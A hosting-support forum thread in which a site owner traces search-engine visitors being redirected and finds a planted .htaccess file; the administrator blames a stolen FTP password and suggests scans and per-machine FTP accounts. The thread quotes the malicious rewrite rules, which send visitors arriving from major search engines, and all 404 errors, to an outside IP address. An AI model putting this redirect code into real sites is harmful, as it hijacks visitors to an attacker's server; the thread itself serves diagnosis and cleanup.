LinkBack URL
About LinkBacksStrange. The link on that page works fine for me too. So perhaps it is not all referrers, and only some? I'd be interested in what google has to say.
Regarding mail2forum, you could always have one written...
GlowHost Administrator
Strange. The link on that page works fine for me too. So perhaps it is not all referrers, and only some? I'd be interested in what google has to say.
Regarding mail2forum, you could always have one written...
Send your friends and site visitors to GlowHost and get $125 plus bonus!
GlowHost Affiliate Program | Read our Blog | Follow us on X |
Nearly a Master Glow Jedi
Found the culprit: the .htaccess file in the root was added or modified with this code:
and the same file was also placed in the public_html folder.Code:RewriteEngine On RewriteCond %{HTTP_REFERER} .*google.*$ [NC,OR] RewriteCond %{HTTP_REFERER} .*aol.*$ [NC,OR] RewriteCond %{HTTP_REFERER} .*msn.*$ [NC,OR] RewriteCond %{HTTP_REFERER} .*altavista.*$ [NC,OR] RewriteCond %{HTTP_REFERER} .*ask.*$ [NC,OR] RewriteCond %{HTTP_REFERER} .*yahoo.*$ [NC] RewriteRule .* http://87.248.180.90/in.html?s=sg [R,L] Errordocument 404 http://87.248.180.90/in.html?s=sg_err
Good call on the redirection/referrer cause, Matt.
Why was the intrusion allowed in the Root folder? I would think that phpBB doesn't have access to the Root folder?
What can we do to prevent future occurrences?
GlowHost Administrator
The logs seem to indicate that your FTP password was compromised. There are some newer exploits out there where a 3rd party site somehow managed to install a trojan on your PC and it sniffs out FTP passwords that have been saved on your PC, then sends them "home" and then "home" uploads all sorts of fun things from htaccess files to new scripts and the link.
The best fix I have found is to run antivirus scans on all computers that you use to access the site via FTP. Once they are clean then change the main cPanel password to something impossible to guess, then setup ftp users for each machine that connects to the site via FTP.... e.g. laoptop@mydomain.com , desktop@mydomain.com , 3rdparty@mydomain.com etc.
Tat way if and when it happens again we can tell you which ftp user was compromised from the logs and you can focus your efforts into figuring out what the security issue is on that unique machine.
Send your friends and site visitors to GlowHost and get $125 plus bonus!
GlowHost Affiliate Program | Read our Blog | Follow us on X |
Nearly a Master Glow Jedi
McAfee scan came back clean. Running Avast scan now...will report results.
Nearly a Master Glow Jedi
Avast scan came back clear as well. This is the only machine I use for FTP connections to my server.
Any other ideas where the compromise might have occurred? Could there be a flaw in cPanel?
GlowHost Administrator
Was the old password something easily guessed? I suppose the only other way they could get it is perhaps with a packet sniffer.
Send your friends and site visitors to GlowHost and get $125 plus bonus!
GlowHost Affiliate Program | Read our Blog | Follow us on X |
Nearly a Master Glow Jedi
Not easy to guess at all. Where would the packet sniffer intercept my traffic?
GlowHost Administrator
Anywhere on the Internet I suppose....
how does a packet sniffer work - Google Search
Send your friends and site visitors to GlowHost and get $125 plus bonus!
GlowHost Affiliate Program | Read our Blog | Follow us on X |
Posting Permissions
Reply With Quote